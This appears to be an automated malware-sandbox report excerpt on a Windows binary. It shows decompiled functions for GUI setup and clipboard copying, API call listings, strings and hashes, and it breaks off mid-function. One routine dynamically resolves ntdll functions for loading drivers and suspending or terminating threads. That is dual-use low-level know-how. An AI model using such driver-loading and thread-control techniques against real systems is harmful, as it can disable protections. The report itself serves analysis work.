0x0040c50f
0x00000000
0x0040c514
0x0040c515

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,?,0040C596,?,?,00000000), ref: 0040C430
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040C447
GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040C459
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040C46B
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040C47D
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040C48F
GetProcAddress.KERNEL32(NtQueryObject), ref: 0040C4A1
GetProcAddress.KERNEL32(NtOpenThread), ref: 0040C4B3
GetProcAddress.KERNEL32(NtClose), ref: 0040C4C5
GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 0040C4D7
GetProcAddress.KERNEL32(NtSuspendThread), ref: 0040C4E9
GetProcAddress.KERNEL32(NtResumeThread), ref: 0040C4FB
GetProcAddress.KERNEL32(NtTerminateThread), ref: 0040C50D

Strings

NtOpenSymbolicLinkObject, xrefs: 0040C46D
NtSuspendThread, xrefs: 0040C4D9
NtClose, xrefs: 0040C4B5
NtQuerySymbolicLinkObject, xrefs: 0040C47F
NtLoadDriver, xrefs: 0040C449
NtQuerySystemInformation, xrefs: 0040C43C
NtQueryObject, xrefs: 0040C491
NtQueryInformationThread, xrefs: 0040C4C7
NtOpenThread, xrefs: 0040C4A3
NtResumeThread, xrefs: 0040C4EB
ntdll.dll, xrefs: 0040C42B
NtUnloadDriver, xrefs: 0040C45B
NtTerminateThread, xrefs: 0040C4FD

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
API String ID: 667068680-4280973841
Opcode ID: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
Instruction ID: 58691313bf47f16c5c12281129ebfbb01f3831da172bf8a538c636a3e5316245
Opcode Fuzzy Hash: 0eddc1e60b10c18c4745ef63ef14c7ef42ad6bc27fe304210325578cd75792ce
Instruction Fuzzy Hash: 27119778D41325AECB12BF71AD09ACA7EB1E764B5671084F7A408722F0D6B942A0DF4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE4D, Relevance: 1.5, APIs: 1, Instructions: 21
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE4D(signed int __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* __edi;
				int _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_t15 = __edx;
				_t13 = __ecx;
				_t16 = __esi + 0x6ac;
				E0040637A(__eax | 0xffffffff, __esi + 0x6ac, 0x40f454);
				 *((intOrPtr*)(__esi + 0x6bc)) = 0x4000;
				E0040AE99(_t13, _t15, __esi,  *((intOrPtr*)(__esi + 0x69c)));
				_t17 = E0040636E(_t16);
				_t11 = OpenClipboard( *(__esi + 0x208));
				if(_t11 != 0) {
					return E004054F1(_t17);
				}
				return _t11;
			}

0x0040ae4d
0x0040ae4d
0x0040ae4e
0x0040ae5c
0x0040ae67
0x0040ae72
0x0040ae84
0x0040ae86
0x0040ae8e
0x00000000
0x0040ae96
0x0040ae98

APIs

Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC

Part of subcall function 0040AE99: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0040AEEB

OpenClipboard.USER32(?), ref: 0040AE86

Part of subcall function 004054F1: EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
Part of subcall function 004054F1: wcslen.MSVCRT ref: 00405506
Part of subcall function 004054F1: GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
Part of subcall function 004054F1: GlobalLock.KERNEL32 ref: 00405523
Part of subcall function 004054F1: memcpy.MSVCRT ref: 0040552C
Part of subcall function 004054F1: GlobalUnlock.KERNEL32(00000000), ref: 00405535
Part of subcall function 004054F1: SetClipboardData.USER32 ref: 0040553E
Part of subcall function 004054F1: CloseClipboard.USER32 ref: 0040554E

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Clipboard$Global$memcpywcslen$AllocCloseDataEmptyLockMessageOpenSendUnlock
String ID:
API String ID: 2178300729-0
Opcode ID: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
Instruction ID: d2c7d0a254bb278864896b88801620e30a707c529b051fe324ebedfb26bf80ea
Opcode Fuzzy Hash: 2bf5dca165b34132fb64bb1855b861156878277b56bd8399cb3bfe959ead56f4
Instruction Fuzzy Hash: F0E0DFB1100B0056C6217736A801B9B76A26F80324B100B3EF8A6B11E2CB3960AA9A49

Uniqueness

Uniqueness Score: -1.00%

Function 0040D12C, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040D12C(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, intOrPtr _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, signed int _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, short _a72, intOrPtr _a76, struct tagRECT _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a584) {
				signed int _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v52;
				struct HWND__* _v56;
				struct HWND__* _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t220;
				void* _t221;
				intOrPtr _t232;
				struct HWND__* _t234;
				void* _t237;
				intOrPtr* _t271;
				signed int _t272;
				signed int _t273;

				_t271 = __esi;
				_t273 = _t272 & 0xfffffff8;
				E0040E340(0x4298, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e4));
				_t234 = GetDlgItem( *(__esi + 0x10), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 0x10), 0x3e8);
				_a20 = GetWindowLongW(_t234, 0xfffffff0);
				_a24 = GetWindowLongW(_a4, 0xfffffff0);
				_a96 = GetWindowLongW(_t234, 0xffffffec);
				_a36 = GetWindowLongW(_a4, 0xffffffec);
				GetWindowRect(_t234,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 0x10),  &_a60, 2);
				_t237 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 0x10));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t271 + 0x10), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t271 + 0x10),  &_a44, 2);
						GetClientRect( *(_t271 + 0x10),  &_a124);
						GetWindowRect( *(_t271 + 0x10),  &_a80);
						SetWindowPos( *(_t271 + 0x10), 0, 0, 0, _a88 - _a80.left + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t271 + 0x10),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t271 + 0x20))(_v0);
						_v24 = E00401551(_t271, _a92, L"STATIC", _a16, _a96, _v0 + _a100.x, _t237, _a72);
						_v52 = E00401551(_t271, _v0, L"EDIT", _v12, _a24, _v32 + _a28, _v8,  *(_t271 + 0x48) * _a4);
						L0040DFD6();
						_t273 = _t273 + 0x10;
						SetWindowTextW(_v56,  &_a72);
						SetWindowTextW(_v60,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x40))))))(_v68,  &_a584,  &_a72, 0xff, L"%s:", _v60->i));
						_v68 = _v68 + 0x14;
						_v72 = _v72 +  *(_t271 + 0x48) * _v36 +  *((intOrPtr*)(_t271 + 0x4c));
						_v76 = _v76 + 1;
					} while (_v76 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
					goto L12;
				}
				_t220 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x44)) + 0x2e0)) <= 0) {
					L8:
					_t221 = _t220 - _t237;
					_a28 = _a28 - _t221;
					_a60.x = _a60.x + _t221;
					_t237 = _t237 + _t221;
					ReleaseDC( *(_t271 + 0x10), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32W(_a16,  *_v0, wcslen( *_v0),  &_a116) != 0) {
						_t232 = _a100.x + 0xa;
						if(_t232 > _v8) {
							_v8 = _t232;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t271 + 0x44)) + 0x2e0)));
				_t220 = _v8;
				goto L8;
			}

0x0040d12c
0x0040d12f
0x0040d137
0x0040d155
0x0040d163
0x0040d170
0x0040d17c
0x0040d185
0x0040d191
0x0040d19d
0x0040d1a7
0x0040d1b2
0x0040d1c6
0x0040d1d4
0x0040d1e5
0x0040d1e9
0x0040d1ee
0x0040d1fd
0x0040d209
0x0040d20d
0x0040d215
0x0040d219
0x0040d2b1
0x0040d2b4
0x0040d2c0
0x0040d3d1
0x0040d3d6
0x0040d3e2
0x0040d3e6
0x0040d3f4
0x0040d40b
0x0040d415
0x0040d45b
0x0040d465
0x0040d4a4
0x0040d4a4
0x0040d2d1
0x0040d2e2
0x0040d2e6
0x0040d2ea
0x0040d2f2
0x0040d323
0x0040d352
0x0040d36e
0x0040d373
0x0040d382
0x0040d3a0
0x0040d3b1
0x0040d3b6
0x0040d3ba
0x0040d3c5
0x00000000
0x0040d2ea
0x0040d222
0x0040d224
0x0040d22e
0x0040d232
0x0040d298
0x0040d29c
0x0040d2a1
0x0040d2a5
0x0040d2a9
0x0040d2ab
0x00000000
0x0040d2ab
0x0040d23b
0x0040d23f
0x0040d266
0x0040d26f
0x0040d276
0x0040d278
0x0040d278
0x0040d276
0x0040d27c
0x0040d287
0x0040d28c
0x0040d294
0x00000000

APIs

GetDlgItem.USER32 ref: 0040D159
GetDlgItem.USER32 ref: 0040D165
GetWindowLongW.USER32(00000000,000000F0), ref: 0040D174
GetWindowLongW.USER32(?,000000F0), ref: 0040D180
GetWindowLongW.USER32(00000000,000000EC), ref: 0040D189
GetWindowLongW.USER32(?,000000EC), ref: 0040D195
GetWindowRect.USER32 ref: 0040D1A7
GetWindowRect.USER32 ref: 0040D1B2
MapWindowPoints.USER32 ref: 0040D1C6
MapWindowPoints.USER32 ref: 0040D1D4
GetDC.USER32 ref: 0040D20D
wcslen.MSVCRT ref: 0040D24D
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0040D25E
ReleaseDC.USER32 ref: 0040D2AB
_snwprintf.MSVCRT ref: 0040D36E
SetWindowTextW.USER32(?,?), ref: 0040D382
SetWindowTextW.USER32(?,00000000), ref: 0040D3A0
GetDlgItem.USER32 ref: 0040D3D6
GetWindowRect.USER32 ref: 0040D3E6
MapWindowPoints.USER32 ref: 0040D3F4
GetClientRect.USER32 ref: 0040D40B
GetWindowRect.USER32 ref: 0040D415
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040D45B
GetClientRect.USER32 ref: 0040D465
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040D49D

Strings

STATIC, xrefs: 0040D30D
EDIT, xrefs: 0040D343
%s:, xrefs: 0040D363

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
Instruction ID: af222cd68e1cf1c2961fcc0c9276d13d323a9bd1d9fa968012e99cc026c1ed94
Opcode Fuzzy Hash: c102a7a5600ef86d24e901ec56d59f6fa3db94701319a0c7660b80572fc7c6b1
Instruction Fuzzy Hash: D4B1C171508301AFD720DFA8C985E6BBBF9FF88714F00492DF695962A1D775E8088F16

Uniqueness

Uniqueness Score: -1.00%

Function 0040A742, Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 303
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040A742(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __esi;
				struct HMENU__* _t123;
				struct HWND__* _t125;
				void* _t131;
				intOrPtr _t135;
				intOrPtr _t139;
				void* _t187;
				long _t193;
				void* _t198;
				void* _t200;
				void* _t216;
				long _t218;
				intOrPtr _t220;
				intOrPtr _t221;
				void* _t222;
				int _t225;
				void* _t226;
				intOrPtr* _t228;
				intOrPtr* _t229;
				void* _t231;
				void* _t232;
				intOrPtr* _t233;
				long _t241;

				_t229 = _t231 - 0x78;
				_t232 = _t231 - 0xa4;
				 *((char*)(_t229 - 0x23)) = 1;
				_t187 = __ecx;
				 *(_t229 - 0x2c) = 0;
				 *((intOrPtr*)(_t229 - 0x28)) = 0;
				 *((char*)(_t229 - 0x24)) = 0;
				 *((char*)(_t229 - 0x22)) = 0;
				 *((char*)(_t229 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 - 0x18) = 1;
				 *((intOrPtr*)(_t229 - 0x14)) = 0x9c41;
				 *((char*)(_t229 - 0x10)) = 4;
				 *((char*)(_t229 - 0xf)) = 0;
				 *((char*)(_t229 - 0xe)) = 0;
				 *((char*)(_t229 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 - 4)) = 5;
				 *_t229 = 0x9c44;
				 *((char*)(_t229 + 4)) = 4;
				 *((char*)(_t229 + 5)) = 0;
				 *((char*)(_t229 + 6)) = 0;
				 *((char*)(_t229 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t229 + 0x10) = 2;
				 *((intOrPtr*)(_t229 + 0x14)) = 0x9c48;
				 *((char*)(_t229 + 0x18)) = 4;
				 *((char*)(_t229 + 0x19)) = 0;
				 *((char*)(_t229 + 0x1a)) = 0;
				 *((char*)(_t229 + 0x1b)) = 0;
				 *(_t229 + 0x68) =  *(_t229 + 0x68) | 0xffffffff;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x24)) = 3;
				 *((intOrPtr*)(_t229 + 0x28)) = 0x9c49;
				 *((char*)(_t229 + 0x2c)) = 4;
				 *((char*)(_t229 + 0x2d)) = 0;
				 *((char*)(_t229 + 0x2e)) = 0;
				 *((char*)(_t229 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x38)) = 0;
				 *((intOrPtr*)(_t229 + 0x3c)) = 0x9c4e;
				 *((char*)(_t229 + 0x40)) = 4;
				 *((char*)(_t229 + 0x41)) = 0;
				 *((char*)(_t229 + 0x42)) = 0;
				 *((char*)(_t229 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t229 + 0x4c)) = 4;
				 *((intOrPtr*)(_t229 + 0x50)) = 0x9c42;
				 *((char*)(_t229 + 0x54)) = 4;
				 *((char*)(_t229 + 0x55)) = 0;
				 *((char*)(_t229 + 0x56)) = 0;
				 *((char*)(_t229 + 0x57)) = 0;
				asm("stosd");
				_t216 = 0x66;
				asm("stosd");
				_t123 = E00406AFA(_t216);
				 *(__ecx + 0x21c) = _t123;
				SetMenu( *(__ecx + 0x208), _t123);
				_t125 = CreateStatusWindowW(0x50000000, 0x40f454,  *(_t187 + 0x208), 0x101);
				 *(_t187 + 0x214) = _t125;
				SendMessageW(_t125, 0x404, 1, _t229 + 0x68);
				 *(_t187 + 0x218) = CreateToolbarEx( *(_t187 + 0x208), 0x50010900, 0x102, 6, 0, E00405F82(), _t229 - 0x2c, 7, 0x10, 0x10, 0x60, 0x10, 0x14);
				 *(_t229 + 0x74) = ImageList_Create(0x10, 0x10, 0x18, 0, 1);
				_t131 = E00402DE1(__fp0);
				 *(_t229 + 0x70) = _t131;
				ImageList_Add( *(_t229 + 0x74), _t131, 0);
				DeleteObject( *(_t229 + 0x70));
				SendMessageW( *(_t187 + 0x218), 0x436, 0,  *(_t229 + 0x74));
				_t135 =  *((intOrPtr*)(_t187 + 0x69c));
				_t236 =  *((intOrPtr*)(_t135 + 0x2f4));
				_t218 = 0x50810809;
				if( *((intOrPtr*)(_t135 + 0x2f4)) != 0) {
					_t218 = 0x50811809;
				}
				E00401EA3( *((intOrPtr*)(_t187 + 0x69c)), _t236, CreateWindowExW(0, L"SysListView32", 0, _t218, 0, 0, 0x190, 0xc8,  *(_t187 + 0x208), 0x103, GetModuleHandleW(0), 0), 1);
				_t139 =  *((intOrPtr*)(_t187 + 0x69c));
				_t193 =  *(_t139 + 0x2e0);
				_t220 =  *((intOrPtr*)(_t139 + 0x2e4));
				 *(_t229 + 0x70) =  *(_t139 + 0x2ac);
				if(_t193 <= 0) {
					L5:
					 *( *((intOrPtr*)(_t187 + 0x69c)) + 0x340) =  *(_t187 + 0x214);
					_t221 =  *((intOrPtr*)(_t187 + 0x69c));
					E004099C4(_t221);
					ImageList_ReplaceIcon( *(_t221 + 0x2b4), 0, LoadIconW(GetModuleHandleW(0), 0x66));
					_t222 = 0x68;
					 *((intOrPtr*)(_t187 + 0x278)) = E00406AFA(_t222);
					 *(_t187 + 0x27c) = 0 | E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0x00000000;
					E0040B147(_t187, E004065C4( *((intOrPtr*)(_t187 + 0x6c0)), L"/nosaveload") >= 0, 0);
					memcpy(_t187 + 0x744,  &(( *(_t187 + 0x698))[0x8a]), 0x200c);
					_t233 = _t232 + 0xc;
					E00401500(_t187 + 0x6c4, 0x72,  *(_t187 + 0x208));
					asm("sbb eax, eax");
					ShowWindow( *(_t187 + 0x6d4),  ~(( *(_t187 + 0x698))[0x89]) & 0x00000005);
					 *( *(_t187 + 0x698)) = 1;
					E004077CB( *((intOrPtr*)(_t187 + 0x69c)));
					_t241 =  *0x4134e0; // 0x0
					if(_t241 == 0) {
						E00405812(0x4134e0);
						if((GetFileAttributesW(0x4134e0) & 0x00000001) != 0) {
							GetTempPathW(0x104, 0x4134e0);
						}
					}
					_t225 = wcslen(0x4134e0);
					 *_t233 = L"report.html";
					_t105 = wcslen(??) + 1; // 0x1
					_t243 = _t225 + _t105 - 0x104;
					if(_t225 + _t105 >= 0x104) {
						 *((short*)(_t187 + 0x288)) = 0;
					} else {
						E00405930(_t187 + 0x288, 0x4134e0, L"report.html");
					}
					_t198 = 0x30;
					E00409BA7( *((intOrPtr*)(_t187 + 0x69c)), _t198);
					_t226 = _t187;
					E0040A6FF(_t226);
					E00405D0F( *(_t187 + 0x214), 0x2000000);
					_t200 = 1;
					 *((intOrPtr*)(_t187 + 0x6a0)) = RegisterWindowMessageW(L"commdlg_FindReplace");
					E0040A1DC(0, _t200, _t226, _t243);
					 *(_t229 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t229 + 0x64)) = 0x400;
					SendMessageW( *(_t226 + 0x214), 0x404, 2, _t229 + 0x60);
					SendMessageW( *(_t226 + 0x214), 0x40b, 0x1001, 0);
					return E00401BDC(_t226, 0x415);
				} else {
					_t228 = _t220 + 0xc;
					 *(_t229 + 0x74) = _t193;
					do {
						E00402842( *((intOrPtr*)(_t228 + 4)),  *((intOrPtr*)(_t228 - 8)),  *(_t229 + 0x70),  *((intOrPtr*)(_t228 - 0xc)),  *((intOrPtr*)(_t228 - 4)),  *_t228);
						_t232 = _t232 + 0x10;
						_t228 = _t228 + 0x14;
						_t81 = _t229 + 0x74;
						 *_t81 =  *(_t229 + 0x74) - 1;
					} while ( *_t81 != 0);
					goto L5;
				}
			}

0x0040a743
0x0040a747
0x0040a74d
0x0040a756
0x0040a75a
0x0040a75d
0x0040a760
0x0040a763
0x0040a766
0x0040a76c
0x0040a76d
0x0040a76e
0x0040a775
0x0040a77c
0x0040a780
0x0040a783
0x0040a786
0x0040a78e
0x0040a78f
0x0040a790
0x0040a797
0x0040a79e
0x0040a7a2
0x0040a7a5
0x0040a7a8
0x0040a7b0
0x0040a7b1
0x0040a7b2
0x0040a7b9
0x0040a7c0
0x0040a7c4
0x0040a7c7
0x0040a7ca
0x0040a7cf
0x0040a7d6
0x0040a7d7
0x0040a7d8
0x0040a7df
0x0040a7e6
0x0040a7ea
0x0040a7ed
0x0040a7f0
0x0040a7f8
0x0040a7f9
0x0040a7fa
0x0040a7fd
0x0040a804
0x0040a808
0x0040a80b
0x0040a80e
0x0040a816
0x0040a817
0x0040a818
0x0040a81f
0x0040a826
0x0040a82a
0x0040a82d
0x0040a830
0x0040a838
0x0040a83b
0x0040a83c
0x0040a83d
0x0040a842
0x0040a84f
0x0040a86a
0x0040a882
0x0040a888
0x0040a8c4
0x0040a8d0
0x0040a8d3
0x0040a8dd
0x0040a8e0
0x0040a8e9
0x0040a8fe
0x0040a900
0x0040a906
0x0040a90c
0x0040a911
0x0040a913
0x0040a913
0x0040a94f
0x0040a954
0x0040a95a
0x0040a962
0x0040a96e
0x0040a971
0x0040a99a
0x0040a9a6
0x0040a9ac
0x0040a9b4
0x0040a9d1
0x0040a9d9
0x0040a9ea
0x0040a9ff
0x0040aa05
0x0040aa22
0x0040aa27
0x0040aa39
0x0040aa4c
0x0040aa58
0x0040aa64
0x0040aa70
0x0040aa75
0x0040aa81
0x0040aa83
0x0040aa91
0x0040aa99
0x0040aa99
0x0040aa91
0x0040aaa5
0x0040aaa7
0x0040aab3
0x0040aab7
0x0040aabd
0x0040aad8
0x0040aabf
0x0040aacf
0x0040aad5
0x0040aae9
0x0040aaea
0x0040aaef
0x0040aaf1
0x0040ab01
0x0040ab07
0x0040ab13
0x0040ab1b
0x0040ab37
0x0040ab3e
0x0040ab45
0x0040ab58
0x0040ab6d
0x0040a973
0x0040a973
0x0040a976
0x0040a979
0x0040a98a
0x0040a98f
0x0040a992
0x0040a995
0x0040a995
0x0040a995
0x00000000
0x0040a979

APIs

Part of subcall function 00406AFA: LoadMenuW.USER32 ref: 00406B02

SetMenu.USER32(?,00000000), ref: 0040A84F
CreateStatusWindowW.COMCTL32(50000000,0040F454,?,00000101), ref: 0040A86A
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040A888

Part of subcall function 00405F82: GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
Part of subcall function 00405F82: LoadImageW.USER32 ref: 00405F9F
Part of subcall function 00405F82: GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
Part of subcall function 00405F82: CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 00405FD1
Part of subcall function 00405F82: GetSysColor.USER32(0000000F), ref: 00405FDC
Part of subcall function 00405F82: GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
Part of subcall function 00405F82: GetPixel.GDI32(00000000,?,?), ref: 0040600A
Part of subcall function 00405F82: SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
Part of subcall function 00405F82: SelectObject.GDI32(00000000,?), ref: 0040603B
Part of subcall function 00405F82: DeleteDC.GDI32(00000000), ref: 00406042

CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040A8B5
ImageList_Create.COMCTL32(00000010,00000010,00000018,00000000,00000001), ref: 0040A8CA

Part of subcall function 00402DE1: GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
Part of subcall function 00402DE1: LoadImageW.USER32 ref: 00402E01
Part of subcall function 00402DE1: GetObjectW.GDI32(?,00000018,?), ref: 00402E25
Part of subcall function 00402DE1: CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402E39
Part of subcall function 00402DE1: GetSysColor.USER32(0000000F), ref: 00402E45
Part of subcall function 00402DE1: GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
Part of subcall function 00402DE1: GetPixel.GDI32(00000000,?,?), ref: 00402E83
Part of subcall function 00402DE1: SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
Part of subcall function 00402DE1: SelectObject.GDI32(00000000,?), ref: 00402F2F
Part of subcall function 00402DE1: DeleteDC.GDI32(00000000), ref: 00402F36

ImageList_Add.COMCTL32(?,00000000,00000000), ref: 0040A8E0
DeleteObject.GDI32(?), ref: 0040A8E9
SendMessageW.USER32(?,00000436,00000000,?), ref: 0040A8FE
GetModuleHandleW.KERNEL32(00000000), ref: 0040A919
CreateWindowExW.USER32 ref: 0040A940
GetModuleHandleW.KERNEL32(00000000,00000000,00000001), ref: 0040A9BA
LoadIconW.USER32(00000000,00000066), ref: 0040A9C3
ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9D1
memcpy.MSVCRT ref: 0040AA22
ShowWindow.USER32(?,?), ref: 0040AA58
GetFileAttributesW.KERNEL32(004134E0), ref: 0040AA89
GetTempPathW.KERNEL32(00000104,004134E0), ref: 0040AA99
wcslen.MSVCRT ref: 0040AAA0
wcslen.MSVCRT ref: 0040AAAE
RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001), ref: 0040AB0D
SendMessageW.USER32(?,00000404,00000002,?), ref: 0040AB45
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040AB58

Strings

report.html, xrefs: 0040AAA7, 0040AABF
commdlg_FindReplace, xrefs: 0040AB08
4A, xrefs: 0040AA7C
SysListView32, xrefs: 0040A93A
/nosaveload, xrefs: 0040A9E5

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreatePixel$ImageMessage$HandleLoadModuleSelectSendWindow$DeleteList_$ColorCompatibleIconMenuwcslen$AttributesFilePathRegisterReplaceShowStatusTempToolbarmemcpy
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$4A
API String ID: 945479791-4224175941
Opcode ID: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
Instruction ID: ef4bcdae66b01cb0e556df410aa057252edbff8cd3310fcf9c61045b6203d9f2
Opcode Fuzzy Hash: 04a5916b9d1b1c31dadef9f7ad9415178030fb231d71024c6285b7e26b69c7e2
Instruction Fuzzy Hash: 35C1C271640344AFEB21DF64CC89FDA3BA5AF54304F04447AFE48AB2A2C7B59844CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004010C7, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004010C7(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
